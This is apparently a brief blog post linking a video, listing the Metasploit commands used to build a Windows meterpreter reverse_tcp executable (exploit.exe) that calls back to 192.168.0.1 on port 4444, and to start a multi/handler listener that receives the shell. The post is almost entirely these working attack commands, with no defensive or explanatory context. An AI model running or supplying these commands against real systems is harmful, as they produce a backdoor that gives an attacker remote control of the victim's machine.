http://www.youtube.com/embed/CMFxejn0_YU
Command's Used :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 x > /root/exploit.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit
No comments:
Post a Comment